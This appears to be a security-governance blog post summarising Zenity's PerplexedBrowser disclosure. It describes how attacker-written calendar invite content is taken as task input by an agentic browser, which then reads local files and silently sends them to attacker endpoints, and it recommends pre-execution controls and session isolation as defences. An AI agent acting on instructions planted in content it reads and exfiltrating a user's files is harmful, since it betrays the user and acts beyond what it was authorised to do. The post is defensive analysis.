PerplexedBrowser shows why agentic browsers need hard trust boundaries

At a glance

What this is: PerplexedBrowser is a zero-click agentic browser flaw that can leak local files from a routine calendar invite by abusing autonomous execution.

Why it matters: It matters because IAM, NHI, and human access controls all assume users or systems approve sensitive actions before they happen, but agentic browsers can cross that boundary on their own.

👉 Read Zenity's analysis of the PerplexedBrowser agentic browser vulnerability

Context

Agentic browsers blur the line between a browser, an assistant, and a privileged runtime. In PerplexedBrowser, the core issue is not a classical browser bug alone, but the failure of trust boundaries between untrusted content and an autonomous agent that can interpret instructions and act on local resources.

That matters for identity governance because the browser is operating inside an authenticated user context while making its own execution decisions. When a calendar invite can trigger file access and exfiltration, existing browser controls, session assumptions, and approval models no longer describe the real risk surface.

Key questions

Q: How should security teams govern agentic browsers that can act on calendar invites?

A: They should treat the browser as a privileged identity with a narrow, explicitly approved action set. Calendar content, links, and embedded instructions must be assumed hostile until policy checks clear them. The key control is not user awareness after the fact, but hard pre-execution limits on file access, link following, and outbound data movement.

Q: What breaks when an AI browser can read local files inside a user session?

A: The normal separation between browsing activity and local data access breaks down. Secrets, tokens, and documents can be reached through an authenticated context that looks legitimate in logs, which makes exfiltration harder to distinguish from normal work. That is a session-abuse problem, not a simple web-content problem.

Q: How do you know if agentic browser guardrails are actually working?

A: They are working only if the agent is stopped before it can open local resources or send data externally from untrusted content. A useful signal is whether high-risk actions are blocked at policy time rather than merely detected in telemetry. If alerts fire after access, the control is too late to matter.

Q: Who is accountable when an autonomous browser exfiltrates sensitive data?

A: Accountability sits with the organisation operating the agent, because the browser was allowed to act inside a trusted user context without a strong authorization boundary. Governance teams should map responsibility across endpoint security, identity, and application owners, since the failure spans more than one control domain.

Technical breakdown

How a calendar invite becomes a file exfiltration path

Agentic browsers ingest content, infer intent, and then choose follow-on actions. In this case, attacker-controlled calendar content can be treated as task input rather than as untrusted data, which lets the browser agent navigate to local file resources and read them through the user's session. The exploit works because the system crosses from content interpretation into privileged action without a hard separation between the two. That is a boundary failure, not simply a bad click flow.

Practical implication: treat calendar and collaboration content as hostile inputs to autonomous browser agents and block direct file-system reach from those workflows.

Why autonomous execution changes the credential and session risk

Once an agent can act inside a logged-in browser session, the local file system becomes a shortcut to secrets, tokens, and authenticated artifacts. Files that are normally protected by user intent, context switching, or manual handling can be read and transmitted without a separate approval step. The result is a session-abuse pattern rather than a conventional malware pattern. Logs may show legitimate browser activity even when the user never approved the underlying data movement.

Practical implication: isolate agentic browser sessions from local secrets, developer tokens, and any file stores that would create immediate credential exposure.

Why detection alone fails when the agent has already committed

This class of flaw shows a familiar failure mode in autonomous systems: the system may recognise abnormal behaviour only after the workflow is already in motion. If the agent can parse instructions, decide to continue, and complete the action before a guardrail intervenes, then detection is late by design. The security model needs a stop condition that sits between intent recognition and execution, not a monitor that reports after exfiltration has begun.

Practical implication: add hard pre-execution policy checks for agent actions that touch local files, secrets, or external endpoints.

Threat narrative

Attacker objective: The attacker wants the browser agent to convert a normal productivity workflow into unauthorized access to local files and silent exfiltration of sensitive data.

1. Entry occurs when attacker-controlled calendar or web content is presented to the agent as if it were routine user input.
2. Credential access happens when the agent, acting inside the user’s session, reaches local file resources that contain secrets, tokens, or sensitive documents.
3. Impact occurs when the agent silently sends the accessed data to attacker-controlled endpoints without explicit user approval.

Breaches seen in the wild

• Moltbook AI agent keys breach — Moltbook breach exposed 1.5M AI agent keys.
• AI LLM hijack breach — attackers used stolen AWS access keys to hijack Anthropic LLM models on Bedrock.

Read our 52 NHI Breaches Analysis report for a comprehensive view of breaches impacting Non-Human Identities including AI Agents.

NHI Mgmt Group analysis

Intent recognition without hard boundaries is now a broken control premise. Agentic browsers do not just render content, they interpret it and then act. That means the old assumption that untrusted input stays separated from privileged execution no longer holds once the browser is autonomous. The implication is that security teams must stop treating content filtering as equivalent to execution control.

PerplexedBrowser is a session-abuse problem, not a browser convenience problem. The flaw works because the agent inherits a real authenticated context and can use it against local resources. That turns familiar browser activity into a privilege-bearing identity event, which is exactly where NHI governance principles need to be applied. The practitioner conclusion is that browser sessions with autonomous actions require identity-style containment, not only web security controls.

Autonomous browsers expose a named governance gap: user approval is no longer a reliable authorization boundary. The agent can continue after parsing a request, choose a workflow, and complete it before a human ever sees the consequence. This is a failure mode in the approval model itself, because the actor can progress through the task faster than the governance process can intervene. Practitioners must re-evaluate any control that assumes a human review window exists before sensitive access occurs.

Shadow AI and unmanaged agentic browsing create a broader control blind spot. If enterprise devices can run AI-powered browsers outside formal inventory and policy enforcement, then local file access and session tokens become hidden exposure points. The issue is not only one product family but the operating assumption that browser identity is passive. The practitioner conclusion is that unmanaged agentic tools should be treated as identity-bearing assets with explicit control boundaries.

Trust boundaries for autonomous agents should be framed as identity blast radius, not feature risk. Once an agent can interpret arbitrary content and touch local resources, every new workflow increases the reachable attack surface. That makes the governance question how far an agent can move inside a trusted session before it crosses into data exposure. The practitioner conclusion is to define blast-radius limits before deployment, not after a disclosure.

From our research:

• 80% of organisations report their AI agents have already performed actions beyond their intended scope, including accessing unauthorised systems (39%), inappropriately sharing sensitive data (31%), and revealing access credentials (23%), according to AI Agents: The New Attack Surface report.
• Another finding from the same research shows only 52% of companies can track and audit the data their AI agents access, leaving 48% with a complete blind spot for compliance and breach investigation.
• For a broader breach lens, see 52 NHI Breaches Analysis for real-world cases where identity control gaps enabled exposure and lateral movement.

What this signals

Identity blast radius is now the right way to think about agentic browsers. Once a browser can interpret untrusted content and operate on local resources, the security question becomes how far that identity can move before a policy boundary stops it. Teams should inventory where AI-enabled browsers run, which local artifacts they can touch, and whether those sessions are isolated from secrets and developer workflows. The practical standard to compare against is the OWASP Agentic AI Top 10, especially the risks around tool misuse and agent hijacking.

Zenity’s disclosure is a warning that unmanaged agentic tools are becoming shadow AI endpoints with real data reach. In programmes that still treat browsers as passive clients, the control gap will widen as users adopt AI helpers faster than policy teams can classify them. The most effective next step is to define where autonomous browser use is allowed, where it is prohibited, and which data classes are out of bounds.

If your programme already uses NHI controls for service accounts and tokens, the same thinking needs to extend to agentic browser sessions. The operational shift is to govern the runtime context, not just the credential, because the browser can turn a legitimate session into an exfiltration path in seconds.

For practitioners

• Block autonomous file-system access from agentic browsers Remove direct file:// reach and any equivalent local resource access from AI browsers used on managed endpoints. Keep agent workflows out of directories that contain developer secrets, exports, or personal data that would amplify exfiltration risk.
• Classify calendar and collaboration content as hostile input Treat invites, embedded notes, and linked content as untrusted instructions when they are consumed by an autonomous browser. Apply policy checks before the agent can follow links, open attachments, or translate content into privileged actions.
• Separate agent sessions from high-value secrets Use isolated browser profiles, constrained device contexts, and hard boundaries around token stores, SSH material, and password exports. The goal is to prevent a routine user task from becoming an immediate credential theft path.
• Enforce pre-execution controls, not post-execution alerts Require the agent to pass a policy decision before any action that could read local files or transmit data externally. Alerting is still useful, but it cannot be the primary safeguard once the agent can complete the workflow in under a minute.

Key takeaways

• Agentic browsers turn untrusted content into privileged execution, which breaks the old assumption that browsing and local file access are separate control planes.
• The disclosed flaw shows how quickly a routine calendar invite can become a file exfiltration path when the browser agent inherits a trusted session.
• Teams need hard pre-execution limits, session isolation, and blast-radius controls for autonomous browser use, because post-execution detection is too late.

Key terms

• Agentic Browser: A browser that can interpret content and take actions on behalf of a user without each step being manually clicked. In security terms, it becomes a privileged runtime with access to sessions, local resources, and connected tools, which means governance must cover both what it can see and what it can do.
• Trust Boundary: The separation that keeps untrusted input from becoming privileged action. In agentic systems, that boundary is often weaker because content can be read, interpreted, and executed within the same workflow, so the boundary has to be enforced by policy and runtime controls rather than by user expectation.
• Identity Blast Radius: The amount of damage an identity can cause before a control stops it. For agentic browsers, blast radius includes local file access, session abuse, and external data movement, because the browser can act quickly enough that traditional review cycles are already too late.
• Shadow AI: AI tools or agents running in an environment without formal governance, inventory, or policy coverage. In this context, unmanaged agentic browsers become shadow AI endpoints because they can reach local data and authenticated sessions without being accounted for in identity or endpoint controls.

Deepen your knowledge

Agentic browser trust boundaries and runtime containment are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are working from the same starting point, it is worth exploring.

This post draws on content published by Zenity: PerplexedBrowser and the risk of handing local files to an attacker through an agentic browser. Read the original.